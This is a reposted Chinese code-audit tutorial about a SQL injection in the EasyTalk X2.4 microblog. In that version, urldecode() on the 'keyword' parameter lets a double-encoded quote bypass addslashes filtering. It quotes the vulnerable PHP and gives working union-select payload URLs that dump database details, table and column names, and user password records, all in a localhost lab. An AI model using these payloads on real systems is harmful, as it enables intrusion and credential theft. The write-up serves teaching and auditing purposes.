【PHP代码审计】 那些年我们一起挖掘SQL注入 - 2.全局防护Bypass之UrlDecode

最新推荐文章于 2025-07-30 22:26:18 发布
转载 最新推荐文章于 2025-07-30 22:26:18 发布 · 101 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/xiaozi/p/5538372.html

0x01 背景

现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号。遇到这种情况我们就需要找一些编码解码的函数来绕过全局防护,这篇文章讲urldecode()的情况,同样大牛请自觉绕道~
漏洞来源于乌云:http://www.wooyun.org/bugs/wooyun-2014-050338

0x02 环境搭建

看背景我们使用了低版本的easytalk程序,版本为X2.4
①源码我打包了一份:http://pan.baidu.com/s/1bopOFNL
②解压到www的easytalk目录下,按照提示一步步安装即可,遇到问题自行百度或谷歌,成功后访问如下图:

0x03 漏洞分析

首先看下源码结构,用的ThinkPHP框架,比较复杂:

有兴趣的可以去研究下再继续往下看,新手可以知道ThinkPHP对接收的参数是有过滤的,并且根据你服务器是否开启GPC会做相应的处理:
1./ThinkPHP/Extend/Library/ORG/Util/Input.class.php文件第266行:

/**
    +----------------------------------------------------------
    * 如果 magic_quotes_gpc 为关闭状态,这个函数可以转义字符串
    +----------------------------------------------------------
    * @access public
    +----------------------------------------------------------
    * @param string $string 要处理的字符串
    +----------------------------------------------------------
    * @return string
    +----------------------------------------------------------
    */
   static public function addSlashes($string) {
       if (!get_magic_quotes_gpc()) {
           $string = addslashes($string);
       }
       return $string;
   }

 

2.使用Seay代码审计系统的全局搜索功能,搜索包含关键字为”urldecode”的文件,发现TopicAction.class.php包含一个对接收的参数keyword进行urldecode并且有sql查询的地方:

3.我们跟进这个php文件,发现接收keyword就对其进行urldecode转码,然后立即带入查询,造成注入:

public function topic()
{
    $keyword = $this->_get('keyword', 'urldecode');//使用ThinkPHP框架自带的_get对接收的keyword参数进行urldecode(详见http://doc.thinkphp.cn/manual/get_system_var.html)
    if ($keyword) {
        $topic = D('Topic')->where("topicname='$keyword'")->find();//ok,带入查询了
        if ($topic) {
            $isfollow = D('Mytopic')->isfollow($topic['id'], $this->my['user_id']);
            $topicusers = D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select();
            $widget = M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select();
            if ($widget) {
                foreach ($widget as $val) {
                    $topicwidget[$val['widgettype']][] = $val;
                }
            }
            $this->assign('topicwidget', $topicwidget);
        } else {
            $count = $isfollow = 0;
        }

        $this->assign('comefrom', 'topic');
        $this->assign('keyword', $keyword);
        $this->assign('topic', $topic);
        $this->assign('topicusers', $topicusers);
        $this->assign('isfollow', $isfollow);
        $this->assign('subname', '#' . $keyword . '#');
        $this->display();
    } else {
        header("location:" . SITE_URL . '/?m=topic&a=index');
    }
}

 

0x04 漏洞证明

1.我们构造获取数据库相关信息的POC:

http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3,concat(database(),0x5c,user(),0x5c,version()),5 %23

成功获取到信息如下:

查看下MySql日志,发现成功执行了sql语句:

2.我们构造获取数据库eazytalk所有表的POC:

http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT table_name) from information_schema.tables where table_schema=0x6561737974616C6B),5%23

成功获取所有表信息如下:

4.构造获取表et_users所有字段信息的POC:

http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT column_name) from information_schema.columns where table_name=0x65745F7573657273),5%23

成功获取表et_users所有字段信息如下:

5.构造获取et_users表第一条账户的POC:

http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT user_name,0x5f,password) from et_users limit 0,1),5%23

成功获取表admin的账户密码如下:

本文由HackBraid整理总结,原文链接:http://www.cnbraid.com/2015/12/24/sql1/,如需转载请联系作者。

转载于:https://www.cnblogs.com/xiaozi/p/5538372.html

an0708
关注
EasyTalk开源微博系统 X2.5.zip
05-27
EasyTalk是国内首款多用户PHP Mysql开源微博客系统,支持网页、手机Wap、手机短信、QQ、Gtalk、飞信等多种方式发表或接收信息,EasyTalk全面符合国人的上网习惯,真正轻量级架构,使得使用者上手容易,管理者安装部署容易、管理便捷。EasyTalk功能强大,便捷的插件系统,可二次开发性高,人性化的模板自定义功能大幅提高了用户的体验,因此EasyTalk相比国内其他微博客软件有绝对的优势! EasyTalk开源微博系统 X2.5 更新日志: 修复系统安全漏洞,强烈建立低版本用户更新 功能特点: 轻量级,简单实用  精彩内容、点滴分享 功能强大、简单实用,兼有主流微博功能,基于ThinkPHP框架开发。  不仅支持网页WEB分享,同时拥有手机3G版、安卓版手机客户端以及IOS手机客户端 灵活的微博字数设置  7大平台、一键登录 不仅可以设置成传统的140字微博,也可以自行更改微博的字数,分享更加灵活。  支持国内外7大平台帐号一键登录,同时可以将微博同步更新到新浪微博或者是腾讯微博。 完善的插件系统  强大的后台管理 内置强大的插件系统,可按照需求来选择下载安装适合的插件或者自己进行二次开发。  拥有强大的后台管理系统,精确到每一个细微之处,对微博进行全面掌控。 基于Oauth2.0的API接口  稳定安全、内容更易掌控 内置完整的API接口,让开发者可以进行无限的功能扩展。  设置敏感词过滤,加强微博内容管理,同时可以对数据库进行备份优化等。
Easytalk博客系统代码审计.docx
04-19
代码审计练习,从本地搭建环境到详细代码审计步骤再到漏洞验证一条龙。EasyTalk是国内首款多用户PHP+Mysql开源微博客系统,支持网页、手机等多种方式发表和接收信息,EasyTalk微博客系统是由兰州乐游网络科技有限公司开发研制而成,轻量级架构,使得使用者上手容易,管理者安装部署容易、管理便捷。EasyTalk功能强大,可二次开发性高,人性化的模板自定义功能。采用PHP+MySQL构建,基于thinkphp框架编写,使用轻量级的模板引擎,使得维护以及美化更简单。系统内使用Memcache对数据查询进行高效的缓存,足可以满足大访问量、高并发的请求
PHP代码审计】 那些我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode
05-28 109
0x01 背景 现在的WEB程序基本都有对SQL注入全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号。同上一篇,我们需要找一些编码解码的函数来绕过全局防护,本篇介绍base64decode()的情况。漏洞来源于乌云:http://www.wooyun.org/bugs/wooyun-2014-0503...
PHP代码审计 -1.SQL注入总结
05-30 110
0x01 背景 最近在学习PHP代码审计,这里做一个SQL注入总结,是对自己学习知识的总结,也是为自己学习的笔记,方便自己反复翻阅。 0x02 PHP代码审计-SQL注入 挖掘SQL注入漏洞的时候,最简单也最容易被发现的就是什么都没过滤的情况。 代码示例 <?php ...
PHP代码审计笔记--SQL注入
11-01 542
    0X01 普通注入 SQL参数拼接,未做任何过滤 &lt;?php $con = mysql_connect("localhost","root","root"); if (!$con){die('Could not connect: ' . mysql_error());} mysql_select_db("test", $con); $id = stripc...
php代码审计【9】SQL 注入研究
司徒荆的博客
06-27 2101
https://www.cnblogs.com/shellr00t/p/5701184.html参考
intval0.57100 php_PHP代码审计归纳-Ali0th
weixin_39618956的博客
02-01 273
Author : 木禾/Ali0thDate : 2018-3-21说明 :个人归纳的php漏洞类型,有修改请私信或留言。大家好,我的网名是木禾,技术领域的 ID 是 Ali0th,这一篇是我在18编写的PHP代码审计归纳,之前发在了 t00ls 和 gtihub 上,现在经营着这个博客,也把以前写的东西慢慢搬上来。如果能帮到你,请点个赞吧。@[toc]变量覆盖extract()该函数使用数组键...
代码审计SQL注入
weixin_38166557的博客
07-24 470
0x00概况说明 0x01报错注入及利用 环境说明 kali LAMP 0x0a 核心代码 现在注入的主要原因是程序员在写sql语句的时候还是通过最原始的语句拼接来完成,另外SQL语句有Select、Insert、Update和Delete四种类型,注入也是对这四种基本操作的拼接产生的。接下来笔者将以Select为例引导新手初步了解SQL注入。Select是数据库的查...
web安全学习-sql注入-针对mysql的攻击
Shanfenglan's blog
02-20 1948
文章目录1. 前言2. 注入攻击2.1 爆数据库名2.2 爆破表名2.3 爆破字段名2.4 爆破字段值2.5 写文件3. 盲注4. 绕过av5. udf/mof6. 参考文章 1. 前言 总结完mysql数据库的基本操作后,我们来看看如何对mysql数据库进行sql注入攻击。 2. 注入攻击 2.1 爆数据库名 2.2 爆破表名 2.3 爆破字段名 2.4 爆破字段值 2.5 写文件 3. 盲注 4. 绕过av 5. udf/mof 6. 参考文章 Bypass disabled_functions一些思路
PHP代码审计归纳-Ali0th
生活的每一天都是新的开始,热爱生活,享受每一刻的精彩。
04-24 775
说明 :个人归纳的php漏洞类型,有修改请私信或留言。
PHP代码审计归纳总结
qq_45655564的博客
07-06 1105
变量覆盖 extract() 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。条件:若有EXTR_SKIP则不行。 <?php $a = "Original"; $my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse"); extract($my_array); echo "\$a = $a; \$b = $b; \$c = $c"; ?> # 结果:
zzcms2019存储型xss漏洞审计(超详细)
Cvjark的博客
03-27 1319
存储型xss漏洞复现 function stripfxg($string,$htmlspecialchars_decode=false,$nl2br=false) { $string=stripslashes($string); if ($htmlspecialchars_decode==true){ $string=htmlspecialchars_decode($string);//转html实体符号 } if ($nl2br==true){ $string=nl2br($
从一开始的网络攻防(十四):WAF绕过
Neolock的博客
07-30 1251
BYPASSWAF技术是通过分析WAF设备与后端应用处理差异实现的防护绕过方法。文章详细解析了WAF的四种部署模式(云WAF、主机防护软件、硬件设备、软WAF)及其工作流程,重点阐述五层绕过技术:1)Web架构层(真实IP获取、畸形数据包);2)Web服务器层(Apache/IIS特性利用);3)应用层(参数污染、编码转换);4)数据库层(SQL语法特性);5)WAF层(性能负载攻击、模糊测试)
PHP WebShell 免杀
悦分享
08-01 7539
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
【AutoHotKey】基于 Bark 推送服务的 Windows Handoff 剪贴板支持工具,解决跨设备同步痛点!.zip
最新发布
12-31
【AutoHotKey】基于 Bark 推送服务的 Windows Handoff 剪贴板支持工具,解决跨设备同步痛点!.zip
从营收增长承压到区域创新生态能级跃升,政府部门借助需求牵引型技术经纪服务能实现多大跨越?.docx
12-31
从营收增长承压到区域创新生态能级跃升,政府部门借助需求牵引型技术经纪服务能实现多大跨越?
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值